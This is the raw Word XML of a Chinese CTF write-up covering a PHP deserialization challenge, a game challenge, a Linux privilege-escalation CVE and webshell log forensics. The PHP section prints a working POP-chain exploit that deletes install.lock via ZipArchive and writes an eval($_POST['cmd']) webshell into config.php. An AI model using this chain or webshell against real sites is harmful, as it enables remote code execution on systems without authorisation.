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F95D0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Info NCE write up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0722DCC0">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E77934">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C542320">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE181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Web 浅析PHP原生类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DD892C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2880" cy="5795645"/>
            <wp:effectExtent l="0" t="0" r="762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92D9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打开之后发现是一段php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类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代码，但是发现没有可以执行命令的地方，尝试使用内置的类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</w:p>
    <w:p w14:paraId="189111E7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唯一可能利用的点是 Until::write 方法里的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE519AA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function write($cla, $file, $cont)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BAD556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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6A9CE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$obj = new $cla();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B50B2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$obj-&gt;open($file, $cont);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB9CBD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return True;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6FE81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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6C87DE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而且要删掉这个install.lock文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370FD852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因为 install::__destruct 中有：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58032A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if(file_exists("install.lock")){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D912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exit("Already installed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6049E58E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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D39B046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// 写入 config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507E49B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file_put_contents('config.php', serialize($config));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE92DD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file_put_contents('install.lock', "ok");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E837FA4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1532798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 install.lock 不存在，就会把 $config 写入 config.php，而 $config 是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FFADC3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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F38898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$config = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A02DB6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'username' =&gt; $this-&gt;username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDFF9A9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'password' =&gt; md5($this-&gt;password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3DD5C1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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FAA2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 install::__destruct 中，file_exists("install.lock") 检查时，如果 install.lock 已删除，就会进入写入 config.php 的分支。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5275B898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CBB0765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所以构造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流程如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0E4C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对象 $break 是 install 类型，它的 username 是 $test（也是 install 对象）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625ACDD1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 $break 被销毁时，__destruct 中 $this-&gt;username 在 $config 数组里被用到，会触发 $test 的 __toString。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F2E58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$test 的 __toString 中，($this-&gt;username)() 会调用 $a（Until 对象）的 __invoke。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A287A81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__invoke 调用 write("ZipArchive", "install.lock", 8)，删除 install.lock。然后 $break 的 __destruct 继续执行，因为 install.lock 不存在，就会把 $this-&gt;username（即 $test）序列化写入 config.php，但这里 $test 是对象，序列化后会包含 Until 对象，可能不直接是 webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCE46F3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E829091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因此最终的exp：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B33B2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&lt;?php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class install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{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private $username;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private $password;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public function __construct($username, $password)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{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    $this-&gt;username = $username;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    $this-&gt;password = $password;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}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}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Class Until {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    public $a;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    public $b;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 xml:space="preserve">        public $c;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}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$a=new Until();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$a-&gt;a="ZipArchive";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$a-&gt;b="install.lock";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$a-&gt;c=8;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$test=new install($a,"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111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");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$break=new install($test,"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111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");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$cmd='&lt;?php eval($_POST["cmd"]);?&gt;';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$exp=new install($cmd,"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111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");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$exp1=[$exp,$break];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echo urlencode(serialize($exp1));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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356CB533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73040" cy="3862705"/>
            <wp:effectExtent l="0" t="0" r="1016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25FE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成功把shell打进config.php，访问后利用hackbar传值，成功拿到flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3AEAEA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8595" cy="3994150"/>
            <wp:effectExtent l="0" t="0" r="190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CCB9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9136541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8017917">
      <w:p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 xml:space="preserve">Game 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我勒个超级玛丽奥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0485828E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A45703B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只要过了第一关就给flag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60179883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5895" cy="3102610"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
            <wp:docPr id="4" name="图片 4" descr="962dfecd1729f1d9a0167b4f14ccd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62dfecd1729f1d9a0167b4f14ccd2b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ECDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A9E9D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534ED790">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EAE94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InfoSec 最近还好吗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45021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这一关就是去查cve，通过题目提示，并且通过ssh连接之后发现读取flag没权限，从而猜测是最新的linux低权限用户的提权cve漏洞，在github上搜索相关的exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08224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8015" cy="4653915"/>
            <wp:effectExtent l="0" t="0" r="6985" b="6985"/>
            <wp:docPr id="5" name="图片 5" descr="ac0c3492b24e9c7929ca19bc6ef2c6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c0c3492b24e9c7929ca19bc6ef2c69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33A0">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="3702050"/>
            <wp:effectExtent l="0" t="0" r="6985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8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git克隆一下这个exploit.sh，然后提供可执行权限执行，即可提权，再读取flag，发现成功读取：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E2A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5622290"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="7" name="图片 7" descr="6cd2d503be73e227f3ab9ebba5675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cd2d503be73e227f3ab9ebba5675e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4D59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F45B00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CDF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可恶的木马竟然伪装成我的朋友</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0817829A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31DD51A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通过题目提示，用vscode打开文件并全局搜索banner_home.jpg关键字，发现总共有800多次的访问量，但是在2018-2-20号的时候流量突然变大，出现了218次！！！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22239D73">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4716780" cy="5461000"/>
            <wp:effectExtent l="0" t="0" r="762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B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可疑程度非常大，点进去根据banner_home.jpg然后往下翻找jsp文件，发现可疑的table.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6867A8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en.jsp，还有2.jsp，并且每次都是同一个ip进行访问。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3E603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C5CD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3446780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="9" name="图片 9" descr="b8d24517f32bbda395ce0ba5d1ae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8d24517f32bbda395ce0ba5d1ae54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B5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从而flag的格式为：flag{2018-2-23/183.62.9.42/table.jsp-en.jsp-2.jsp}，提交后显示正确。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37631"/>
    <w:rsid w:val="61C3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character" w:customStyle="1" w:styleId="9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2025-11-24T14:52:00Z</dcterms:created>
  <dc:creator>胡景康</dc:creator>
  <cp:lastModifiedBy>胡景康</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-24T15:33:34Z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9004AF342C0440ABB5249B10F69A96E5_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiYzJjODczODdjZmRmN2E3ZGM3NGE2NzMyY2RkMzFkNjQiLCJ1c2VySWQiOiIxNjY1MzAwNTgxIn0=</vt:lpwstr>
  </property>
</Properties>
</file>